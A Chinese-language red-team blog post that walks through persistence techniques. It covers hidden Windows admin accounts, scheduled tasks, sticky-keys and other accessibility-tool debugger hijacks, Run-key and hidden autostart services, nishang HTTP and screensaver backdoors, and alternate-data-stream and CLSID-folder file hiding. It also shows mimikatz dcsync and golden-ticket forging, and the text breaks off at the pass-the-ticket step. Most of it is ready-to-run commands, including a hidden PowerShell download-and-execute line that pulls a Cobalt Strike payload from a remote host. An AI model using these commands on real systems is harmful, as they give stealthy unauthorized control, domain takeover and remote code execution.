<!DOCTYPE HTML>
<html>
<head>
  <meta charset="utf-8">
  <meta http-equiv="pragma" content="no-cache">
  <meta http-equiv="cache-control" content="no-cache">
  <meta http-equiv="expires" content="0">
  
  <title>权限维持手法 | Jici&#39;s Blog</title>
  <meta name="author" content="Jici">
  
  <meta name="description" content="在本文从Windows 主机后门、Windows 文件隐藏、域后门、Linux 后门、Linux 文件隐藏这五个方面讨论红队中的权限维持手法

[TOC]">
  
  
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">

  <meta property="og:title" content="权限维持手法"/>
  <meta property="og:site_name" content="Jici&#39;s Blog"/>

  
    <meta property="og:image" content=""/>
  

  
  
    <link href="/favicon-16x16.png" rel="icon">
  
  
  <link rel="stylesheet" href="/css/bootstrap.min.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/font-awesome.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/style.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/responsive.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/highlight.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/google-fonts.css" media="screen" type="text/css">
  <!--[if lt IE 9]><script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script><![endif]-->

  <script src="/js/jquery-2.0.3.min.js"></script>

  <!-- analytics -->
  
<script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','//www.google-analytics.com/analytics.js','ga');
  ga('create', 'UA-70812759-1', 'auto');
  ga('send', 'pageview');
</script>



<script>
var _hmt = _hmt || [];
(function() {
  var hm = document.createElement("script");
  hm.src = "//hm.baidu.com/hm.js?cb5448498d7169c668b07c2b255d62c1";
  var s = document.getElementsByTagName("script")[0]; 
  s.parentNode.insertBefore(hm, s);
})();
</script>


<!-- hexo injector head_end start --><script> let HEXO_MMEDIA_DATA = { js: [], css: [], aplayerData: [], metingData: [], artPlayerData: [], dplayerData: []}; </script><!-- hexo injector head_end end --><meta name="generator" content="Hexo 6.3.0"></head>

 <body>  
  <nav id="main-nav" class="navbar navbar-inverse navbar-fixed-top" role="navigation">
    <div class="container">
      <button type="button" class="navbar-header navbar-toggle" data-toggle="collapse" data-target=".navbar-collapse">
		<span class="sr-only">Toggle navigation</span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
      </button>
	  <a class="navbar-brand" href="/">Jici&#39;s Blog</a>
      <div class="collapse navbar-collapse nav-menu">
		<ul class="nav navbar-nav">
		  
		  <li>
			<a href="/archives" title="All the articles.">
			  <i class=""></i>所有文章
			</a>
		  </li>
		  
		  <li>
			<a href="/about" title="About me.">
			  <i class=""></i>关于我
			</a>
		  </li>
		  
		  <li>
			<a href="/record" title="Record all kinds of completed target machines">
			  <i class=""></i>记录榜
			</a>
		  </li>
		  
		  <li>
			<a href="/plan" title="Record what needs to be done and what is worth doing">
			  <i class=""></i>计划清单
			</a>
		  </li>
		  
		  <li>
			<a href="/friendlinks" title="my friends">
			  <i class=""></i>友情链接
			</a>
		  </li>
		  
		  <li>
			<a href="/pictureGallery" title="Record some exquisite pictures">
			  <i class=""></i>画廊
			</a>
		  </li>
		  
		</ul>
      </div>
    </div> <!-- container -->
</nav>
<div class="clearfix"></div>

  <div class="container">
  	<div class="content">
    	 

  
<script type="text/x-mathjax-config">
  MathJax.Hub.Config({
    tex2jax: {
      inlineMath: [ ['$','$'], ["\\(","\\)"] ],
      processEscapes: true,
      skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code']
    }
  });
  MathJax.Hub.Queue(function() {
    var all = MathJax.Hub.getAllJax(), i;
    for(i=0; i < all.length; i += 1) {
        all[i].SourceElement().parentNode.className += ' has-jax';
    }
  });
</script>
<script type="text/javascript" src="https://cdn.jsdelivr.net/npm/mathjax@2.7.8/MathJax.js?config=TeX-AMS-MML_HTMLorMML"></script>



	
		<div class="page-header">
			<h1> 权限维持手法</h1>
		</div>
	



<div class="row post">
	<!-- cols -->
	
	<div id="top_meta"></div>
	<div class="col-md-9">
	

	<!-- content -->
	<div class="mypage">		
	  		

	  <p>在本文从Windows 主机后门、Windows 文件隐藏、域后门、Linux 后门、Linux 文件隐藏这五个方面讨论红队中的权限维持手法</p>
<p><img src="https://huoxian-community.oss-cn-beijing.aliyuncs.com/2022-01-24/1642995329-754146-image.png" alt="img"></p>
<p>[TOC]</p>
<h1 id="Windows主机后门"><a href="#Windows主机后门" class="headerlink" title="Windows主机后门"></a>Windows主机后门</h1><h2 id="1、隐藏账号"><a href="#1、隐藏账号" class="headerlink" title="1、隐藏账号"></a>1、隐藏账号</h2><pre class="line-numbers language-none"><code class="language-none">#这个是比较常见的创建后门的方法，直接建立一个隐藏账号
#虽然使用 net user 是看不到这个账号的，但是在控制面板里可以看到，因此这种隐藏效果并不是很好
net user teamssix$ Passw0rd &#x2F;add
net localgroup administrators teamssix$ &#x2F;add<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span></span></code></pre>
<p><img src="/2023/10/28/%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81%E6%89%8B%E6%B3%95/image-20231029121500510.png" alt="image-20231029121500510"></p>
<p><img src="/2023/10/28/%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81%E6%89%8B%E6%B3%95/image-20231029121535128.png" alt="image-20231029121535128"></p>
<p>说明：想要更好的隐藏效果，可以通过注册表克隆用户实现，只是操作起来比较繁琐。teamssix师傅写的一个利用注册表创建隐藏用户的小工具可以快速实现这个功能【<a target="_blank" rel="noopener" href="https://github.com/wgpsec/CreateHiddenAccount】">https://github.com/wgpsec/CreateHiddenAccount】</a></p>
<pre class="line-numbers language-none"><code class="language-none">#创建一个隐藏用户
CreateHiddenAccount.exe -u teamssix -p Passw0rd
#检查当前系统的隐藏账号
CreateHiddenAccount.exe -c
#删除用户
CreateHiddenAccount.exe -d teamssix<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<h2 id="2、计划任务"><a href="#2、计划任务" class="headerlink" title="2、计划任务"></a>2、计划任务</h2><p>说明：计划任务也是比较常见的权限维持方法，计划任务在 Win7 之前使用 at 命令，之后的系统中使用 schtasks 命令</p>
<pre class="line-numbers language-none"><code class="language-none">#每小时执行一次calc.exe
schtasks &#x2F;create &#x2F;tn updater &#x2F;tr calc.exe &#x2F;sc hourly &#x2F;mo 1<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>
<p><img src="/2023/10/28/%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81%E6%89%8B%E6%B3%95/image-20231029122454235.png" alt="image-20231029122454235"></p>
<pre class="line-numbers language-none"><code class="language-none">#当系统空闲时，执行 CS 上线 PowerShell 脚本
schtasks &#x2F;create &#x2F;tn WindowsUpdate &#x2F;tr &quot;powershell.exe -nop -w hidden -c &#39;IEX ((new-object net.webclient).downloadstring(&#39;&#39;&#39;http:&#x2F;&#x2F;172.16.214.1:80&#x2F;a&#39;&#39;&#39;))&#39;&quot; &#x2F;sc onidle &#x2F;i 1<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>
<p><img src="/2023/10/28/%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81%E6%89%8B%E6%B3%95/image-20231029123133242.png" alt="image-20231029123133242"></p>
<p><img src="/2023/10/28/%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81%E6%89%8B%E6%B3%95/image-20231029123204176.png" alt="image-20231029123204176"></p>
<h2 id="3、shift后门"><a href="#3、shift后门" class="headerlink" title="3、shift后门"></a>3、shift后门</h2><pre class="line-numbers language-none"><code class="language-none">copy C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe &#x2F;y<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p><img src="/2023/10/28/%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81%E6%89%8B%E6%B3%95/image-20231029123912764.png" alt="image-20231029123912764"></p>
<pre class="line-numbers language-none"><code class="language-none">#如果提示访问被拒绝，可以在管理员权限下，加上 everyone 的权限再试试
cacls C:\Windows\System32\sethc.exe  &#x2F;T &#x2F;E &#x2F;G everyone:F
copy C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe &#x2F;y<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>
<p><img src="/2023/10/28/%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81%E6%89%8B%E6%B3%95/image-20231029123416073.png" alt="image-20231029123416073"></p>
<pre class="line-numbers language-none"><code class="language-none">#也可以使用注册表
REG ADD &quot;HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe&quot; &#x2F;v Debugger &#x2F;t REG_SZ &#x2F;d &quot;C:\windows\system32\cmd.exe&quot;<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>
<p>说明：在系统登录界面，按5下shift键就能打开cmd窗口，即粘滞键后门</p>
<p><img src="/2023/10/28/%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81%E6%89%8B%E6%B3%95/image-20231029125825458.png" alt="image-20231029125825458"></p>
<p>补充：除了使用按5下shift 打开粘滞键的功能外，同样的道理，还可以使用辅助工具、放大镜、屏幕键盘等等</p>
<pre class="line-numbers language-none"><code class="language-none">#这里演示使用辅助工具utilman.exe
REG ADD &quot;HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe&quot; &#x2F;t REG_SZ &#x2F;v Debugger &#x2F;d &quot;C:\windows\system32\cmd.exe&quot; &#x2F;f<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>
<p><img src="/2023/10/28/%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81%E6%89%8B%E6%B3%95/image-20231029141159902.png" alt="image-20231029141159902"></p>
<p><img src="/2023/10/28/%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81%E6%89%8B%E6%B3%95/image-20231029141321051.png" alt="image-20231029141321051"></p>
<p><img src="/2023/10/28/%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81%E6%89%8B%E6%B3%95/1642995681-882230-image.png" alt="img"></p>
<pre class="line-numbers language-none"><code class="language-none">#演示使用屏幕键盘osk.exe
REG ADD &quot;HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe&quot; &#x2F;t REG_SZ &#x2F;v Debugger &#x2F;d &quot;C:\windows\system32\cmd.exe&quot; &#x2F;f<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>
<p><img src="/2023/10/28/%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81%E6%89%8B%E6%B3%95/image-20231029141628319.png" alt="image-20231029141628319"></p>
<p><img src="/2023/10/28/%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81%E6%89%8B%E6%B3%95/1642995698-111867-image.png" alt="img"></p>
<pre class="line-numbers language-none"><code class="language-none">#演示放大镜Magnify.exe
REG ADD &quot;HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Magnify.exe&quot; &#x2F;t REG_SZ &#x2F;v Debugger &#x2F;d &quot;C:\windows\system32\cmd.exe&quot; &#x2F;f<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>
<p><img src="/2023/10/28/%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81%E6%89%8B%E6%B3%95/image-20231029142221757.png" alt="image-20231029142221757"></p>
<p><img src="/2023/10/28/%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81%E6%89%8B%E6%B3%95/image-20231029142234592.png" alt="image-20231029142234592"></p>
<p><img src="/2023/10/28/%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81%E6%89%8B%E6%B3%95/1642995711-431791-image.png" alt="img"></p>
<h2 id="4、组策略"><a href="#4、组策略" class="headerlink" title="4、组策略"></a>4、组策略</h2><p>流程：</p>
<ol>
<li>新建一个 bat 文件，这里 bat 内容遵循cmd/PowerShell语法，比如 calc</li>
<li>进入本地组策略<ul>
<li>终端中键入gpedit.msc</li>
<li>win+R键入gpedit.msc</li>
</ul>
</li>
<li>用户配置—&gt;Windows设置—&gt;脚本登录—&gt;选择 bat 文件【当用户登录时就会触发这个 bat 文件】</li>
</ol>
<p><img src="/2023/10/28/%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81%E6%89%8B%E6%B3%95/1642995722-703721-image.png" alt="img"></p>
<h2 id="5、注册表"><a href="#5、注册表" class="headerlink" title="5、注册表"></a>5、注册表</h2><p>说明：在系统启动的注册表下添加恶意程序，这样当用户登录系统时，exe 就会被运行，或者将 exe 直接放到系统启动的文件夹里也是一样的道理</p>
<pre class="line-numbers language-none"><code class="language-none">reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run &#x2F;v &quot;Vmware Regg&quot; &#x2F;t REG_SZ &#x2F;d &quot;C:\Windows\System32\calc.exe&quot; &#x2F;f<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p><img src="/2023/10/28/%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81%E6%89%8B%E6%B3%95/image-20231029143436820.png" alt="image-20231029143436820"></p>
<p><img src="/2023/10/28/%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81%E6%89%8B%E6%B3%95/image-20231029143510992.png" alt="image-20231029143510992"></p>
<p><img src="/2023/10/28/%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81%E6%89%8B%E6%B3%95/1642995733-68515-image.png" alt="img"></p>
<h2 id="6、服务自启动"><a href="#6、服务自启动" class="headerlink" title="6、服务自启动"></a>6、服务自启动</h2><p>说明：直接使用命令创建服务</p>
<pre class="line-numbers language-none"><code class="language-none">sc create teamssix start&#x3D;auto binPath&#x3D;&quot;cmd.exe &#x2F;k ping -n 1 test.xxx.ceye.io&quot; obj&#x3D;Localsystem<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p><img src="/2023/10/28/%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81%E6%89%8B%E6%B3%95/image-20231029143646494.png" alt="image-20231029143646494"></p>
<p><img src="/2023/10/28/%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81%E6%89%8B%E6%B3%95/image-20231029143652136.png" alt="image-20231029143652136"></p>
<p><img src="/2023/10/28/%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81%E6%89%8B%E6%B3%95/image-20231029143704256.png" alt="image-20231029143704256"></p>
<pre class="line-numbers language-none"><code class="language-none">#启动该服务
net start teamssix
#可能会报错，但其实是被执行的<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>
<p><img src="/2023/10/28/%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81%E6%89%8B%E6%B3%95/1642995751-115259-image.png" alt="img"></p>
<p>注意：这种创建服务的方法隐藏性太弱，直接在服务里就能看到</p>
<p><img src="/2023/10/28/%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81%E6%89%8B%E6%B3%95/1642995769-935072-image.png" alt="img"></p>
<p>可以在创建完服务后，使用以下命令将创建的服务隐藏，这样不论是在服务中，还是使用命令都查不到这个服务，如下</p>
<pre class="line-numbers language-none"><code class="language-none">#隐藏服务
sc.exe sdset teamssix &quot;D:(D;;DCLCWPDTSDCC;;;IU)(D;;DCLCWPDTSDCC;;;SU)(D;;DCLCWPDTSDCC;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)&quot;<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>
<p><img src="/2023/10/28/%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81%E6%89%8B%E6%B3%95/1642995779-915667-image.png" alt="img"></p>
<pre class="line-numbers language-none"><code class="language-none">#可以使用以下命令恢复
&amp; $env:SystemRoot\System32\sc.exe sdset teamssix &quot;D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)&quot;<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>
<h2 id="7、nishang后门"><a href="#7、nishang后门" class="headerlink" title="7、nishang后门"></a>7、nishang后门</h2><p>说明：nishang 是一个 PowerShell 项目，里面集成了众多工具，其中包含有制作后门的工具【<a target="_blank" rel="noopener" href="https://github.com/samratashok/nishang】">https://github.com/samratashok/nishang】</a></p>
<h3 id="HTTP-Backdoor"><a href="#HTTP-Backdoor" class="headerlink" title="HTTP-Backdoor"></a>HTTP-Backdoor</h3><pre class="line-numbers language-none"><code class="language-none">cd nishang\Backdoors
Import-Module .\HTTP-Backdoor.ps1
HTTP-Backdoor -CheckURL http:&#x2F;&#x2F;192.168.7.1&#x2F;1.txt -PayloadURL http:&#x2F;&#x2F;192.168.7.1&#x2F;calc.ps1 -MagicString start -StopString stop<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>
<p><img src="/2023/10/28/%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81%E6%89%8B%E6%B3%95/image-20231029150732405.png" alt="image-20231029150732405"></p>
<p><code>说明：该脚本会读取 CheckURL 的内容，这里设置的 MagicString 为 start，即当 http://192.168.7.1/1.txt 内容为 start 的时候，就会执行 http://192.168.7.1/calc.ps1 脚本</code></p>
<p><img src="/2023/10/28/%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81%E6%89%8B%E6%B3%95/1642995787-819963-image.png" alt="img"></p>
<h3 id="Add-ScrnSaveBackdoor"><a href="#Add-ScrnSaveBackdoor" class="headerlink" title="Add-ScrnSaveBackdoor"></a>Add-ScrnSaveBackdoor</h3><p>说明：Add-ScrnSaveBackdoor 脚本可以帮助攻击者利用 Windows 的屏幕保护程序来安装一个隐藏的后门，该脚本需要管理员权限</p>
<pre class="line-numbers language-none"><code class="language-none">Import-Module .\Add-ScrnSaveBackdoor.ps1
Add-ScrnSaveBackdoor -Payload &quot;Powershell.exe calc&quot;<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>
<p><img src="/2023/10/28/%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81%E6%89%8B%E6%B3%95/1642995798-424517-image.png" alt="img"></p>
<p>当屏幕保护程序启动时，就会运行 Payload 里的内容</p>
<p><img src="/2023/10/28/%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81%E6%89%8B%E6%B3%95/1642995806-737528-image.png" alt="img"></p>
<p>除了上面的两个脚本外，还有 Execute-OnTime 和 Invoke-ADSBackdoor。其中 Execute-OnTime 和 HTTP-Backdoor 脚本的使用方法相似，不过增加了定时启动脚本的功能。Windows 下的制作后门方法当然不止上面这些，还有其他的，比如进程注入、dll 劫持等等。</p>
<h1 id="Windows文件隐藏"><a href="#Windows文件隐藏" class="headerlink" title="Windows文件隐藏"></a>Windows文件隐藏</h1><h2 id="1、文件属性"><a href="#1、文件属性" class="headerlink" title="1、文件属性"></a>1、文件属性</h2><p>说明：文件右击属性，选择隐藏即可</p>
<p><img src="/2023/10/28/%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81%E6%89%8B%E6%B3%95/1642995815-443214-image.png" alt="img"></p>
<p>如果想显示文件，就在文件夹选择中选择「显示隐藏的文件、文件夹和驱动器」就行了</p>
<p><img src="/2023/10/28/%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81%E6%89%8B%E6%B3%95/1642995824-299239-image.png" alt="img"></p>
<p>也可以键入如下命令</p>
<pre class="line-numbers language-none"><code class="language-none">attrib +s +a +h +r <span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p><img src="/2023/10/28/%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81%E6%89%8B%E6%B3%95/1642995831-613157-image.png" alt="img"></p>
<h2 id="2、ADS"><a href="#2、ADS" class="headerlink" title="2、ADS"></a>2、ADS</h2><p>说明：ADS是NTFS磁盘格式的一个特性，在NTFS文件系统下，每个文件都可以存在多个数据流，创建一个数据交换流文件的方法很简单，命令为“宿主文件:准备与宿主文件关联的数据流文件”。</p>
<pre class="line-numbers language-none"><code class="language-none">echo teamssix &gt; CreateHiddenAccount_v0.2.exe:test.txt<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>使用 dir 是看不到的，使用 dir /r 才可以</p>
<p><img src="/2023/10/28/%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81%E6%89%8B%E6%B3%95/1642995857-995048-image.png" alt="img"></p>
<p>如果想编辑该文件，可以使用 notepad 进行编辑</p>
<p><img src="/2023/10/28/%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81%E6%89%8B%E6%B3%95/1642995865-198699-image.png" alt="img"></p>
<p>如果想执行 exe 文件，可以先创建一个快捷方式，再执行</p>
<pre class="line-numbers language-none"><code class="language-none">type evil.exe &gt; CreateHiddenAccount_v0.2.exe:evil.exe
#需要管理员权限
mklink &quot;C:\Users\test\Desktop\evillink.exe&quot; &quot;C:\Users\test\Desktop\CreateHiddenAccount_v0.2.exe:evil.exe&quot;
start evil.exe
#如果想删除这个隐藏文件，需要删除宿主文件才行<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<h2 id="3、系统文件夹伪装"><a href="#3、系统文件夹伪装" class="headerlink" title="3、系统文件夹伪装"></a>3、系统文件夹伪装</h2><p>例如这里有一个 test 文件夹，将 test 命名为：我的电脑.{20D04FE0-3AEA-1069-A2D8-08002B30309D}，这时文件夹的图标就会变为「我的电脑」图标</p>
<p><img src="/2023/10/28/%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81%E6%89%8B%E6%B3%95/1642995875-275666-image.png" alt="img"></p>
<p>使用 dir 可以看到里面的文件，但如果点击这个文件夹，就会真的进入到「我的电脑」界面里</p>
<p><img src="/2023/10/28/%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81%E6%89%8B%E6%B3%95/1642995882-883710-image.png" alt="img"></p>
<p>下面是一些其他的常用标识符</p>
<pre class="line-numbers language-none"><code class="language-none">上帝模式.&#123;ED7BA470-8E54-465E-825C-99712043E01C&#125;
CLSIDexcel.&#123;00020810-0000-0000-C000-000000000046&#125;
word.&#123;00020900-0000-0000-C000-000000000046&#125;
media.&#123;00022603-0000-0000-C000-000000000046&#125;
CAB.&#123;0CD7A5C0-9F37-11CE-AE65-08002B2E1262&#125;
计划任务.&#123;148BD520-A2AB-11CE-B11F-00AA00530503&#125;
搜索-计算机&#123;1f4de370-d627-11d1-ba4f-00a0c91eedba&#125;
网上邻居.&#123;208D2C60-3AEA-1069-A2D7-08002B30309D&#125;
我的电脑.&#123;20D04FE0-3AEA-1069-A2D8-08002B30309D&#125;
控制面板.&#123;21EC2020-3AEA-1069-A2DD-08002B30309D&#125;
打印机.&#123;2227A280-3AEA-1069-A2DE-08002B30309D&#125;
html.&#123;25336920-03f9-11cf-8fd0-00aa00686f13&#125;
mht.&#123;3050F3D9-98B5-11CF-BB82-00AA00BDCE0B&#125;
mshta.&#123;3050f4d8-98B5-11CF-BB82-00AA00BDCE0B&#125;
我的文档.&#123;450D8FBA-AD25-11D0-98A8-0800361B1103&#125;
XML.&#123;48123bc4-99d9-11d1-a6b3-00c04fd91555&#125;
回收站(满).&#123;5ef4af3a-f726-11d0-b8a2-00c04fc309a4&#125;
回收站.&#123;645FF040-5081-101B-9F08-00AA002F954E&#125;
ftp_folder.&#123;63da6ec0-2e98-11cf-8d82-444553540000&#125;
网络和拨号连接.&#123;7007ACC7-3202-11D1-AAD2-00805FC1270E&#125;
写字板文档.&#123;73FDDC80-AEA9-101A-98A7-00AA00374959&#125;
Temporary Offline Files Cleaner.&#123;750fdf0f-2a26-11d1-a3ea-080036587f03&#125;
用户和密码.&#123;7A9D77BD-5403-11d2-8785-2E0420524153&#125;
Internet 临时文件.&#123;7BD29E00-76C1-11CF-9DD0-00A0C9034933&#125;
已下载的程序文件的清除程序.&#123;8369AB20-56C9-11D0-94E8-00AA0059CE02&#125;
公文包.&#123;85BBD920-42A0-1069-A2E4-08002B30309D&#125;
ActiveX 高速缓存文件夹.&#123;88C6C381-2E85-11D0-94DE-444553540000&#125;
mail.&#123;9E56BE60-C50F-11CF-9A2C-00A0C90A90CE&#125;
历史记录.&#123;FF393560-C2A7-11CF-BFF4-444553540000&#125;
目录.&#123;fe1290f0-cfbd-11cf-a330-00aa00c16e65&#125;
Internet Explorer.&#123;FBF23B42-E3F0-101B-8488-00AA003E56F8&#125;
Snapshot File.&#123;FACB5ED2-7F99-11D0-ADE2-00A0C90DC8D9&#125;
预订文件夹.&#123;F5175861-2688-11d0-9C5E-00AA00A45957&#125;
MyDocs Drop Target.&#123;ECF03A32-103D-11d2-854D-006008059367&#125;
Policy Package.&#123;ecabaebd-7f19-11d2-978E-0000f8757e2a&#125;
搜索结果.&#123;e17d4fc0-5564-11d1-83f2-00a0c90dc849&#125;
添加网上邻居.&#123;D4480A50-BA28-11d1-8E75-00C04FA31A86&#125;
Paint.&#123;D3E34B21-9D75-101A-8C3D-00AA001A1652&#125;
管理工具.&#123;D20EA4E1-3957-11d2-A40B-0C5020524153&#125;
字体.&#123;D20EA4E1-3957-11d2-A40B-0C5020524152&#125;
Web Folders.&#123;BDEADF00-C265-11d0-BCED-00A0C90AB50F&#125;
DocFind Command.&#123;B005E690-678D-11d1-B758-00A0C90564FE&#125;
脱机文件夹.&#123;AFDB1F70-2A4C-11d2-9039-00C04F8EEB3E&#125;
打印机.&#123;2227A280-3AEA-1069-A2DE-08002B30309D&#125;<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>说明：其他手法还有畸形文件夹、保留文件名无法删除和利用 Easy File Locker 实现驱动级文件隐藏等等，或者直接起一个看起来名称很像的文件，比如 Index.php 和 lndex.php，这里其中一个是大写的 i，一个是小写的 L</p>
<h1 id="域后门"><a href="#域后门" class="headerlink" title="域后门"></a>域后门</h1><h2 id="1、黄金票据"><a href="#1、黄金票据" class="headerlink" title="1、黄金票据"></a>1、黄金票据</h2><p>说明：通过黄金票据可以实现域内任意用户的伪造，因此即使目标域管理员的密码被修改了，通过黄金票据还是能够获取到对方的权限</p>
<p>在生成黄金票据前，需要先获取以下信息：</p>
<ul>
<li>krbtgt 的 NTLM Hash 或 AES-256 值</li>
<li>伪造的域管理员用户名</li>
<li>完整的域名</li>
<li>域 SID</li>
</ul>
<blockquote>
<p>其中 krbtgt 用户是域自带的用户，被 KDC 密钥分发中心服务所使用，属于 Domain Admins 组。在域环境中，每个用户账号的票据都是由 krbtgt 用户所生成的，因此如果知道了 krbtgt 用户的 NTLM Hash 或者 AES-256 值，就可以伪造域内任意用户的身份了。</p>
</blockquote>
<p>操作流程：</p>
<ol>
<li>使用 mimikatz 在域控上获取 krbtgt 用户的 NTLM HASH</li>
</ol>
<pre class="line-numbers language-none"><code class="language-none">mimikatz.exe &quot;lsadump::dcsync &#x2F;domain:teamssix.com &#x2F;user:krbtgt&quot; exit<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p><img src="/2023/10/28/%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81%E6%89%8B%E6%B3%95/1642995893-285294-image.png" alt="img"></p>
<p>从图中可以看到 krbtgt 的 NTLM Hash 为 d685b9c4fa2d318a9943ed68948af087，SID 为 S-1-5-21-284927032-1122706408-2778656994。此时已知域名为 teamssix.com，那么这时所需要的信息就全了。接着来到一台普通域用户权限的主机下，查看 \dc\c$ 发现时拒绝访问的</p>
<p><img src="/2023/10/28/%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81%E6%89%8B%E6%B3%95/image-20231029234249010.png" alt="image-20231029234249010"></p>
<ol>
<li>制作黄金票据</li>
</ol>
<pre class="line-numbers language-none"><code class="language-none">kerberos::golden &#x2F;admin:Administrator &#x2F;domain:teamssix.com &#x2F;sid:S-1-5-21-284927032-1122706408-2778656994 &#x2F;krbtgt:d685b9c4fa2d318a9943ed68948af087 &#x2F;ticket:Administrator.kiribi<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p><img src="/2023/10/28/%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81%E6%89%8B%E6%B3%95/1642995946-803021-image.png" alt="img"></p>
<ol>
<li>使用 mimikatz 进行票据传递</li>
</ol>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash">kerberos::ptt Administrator.kiribi<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
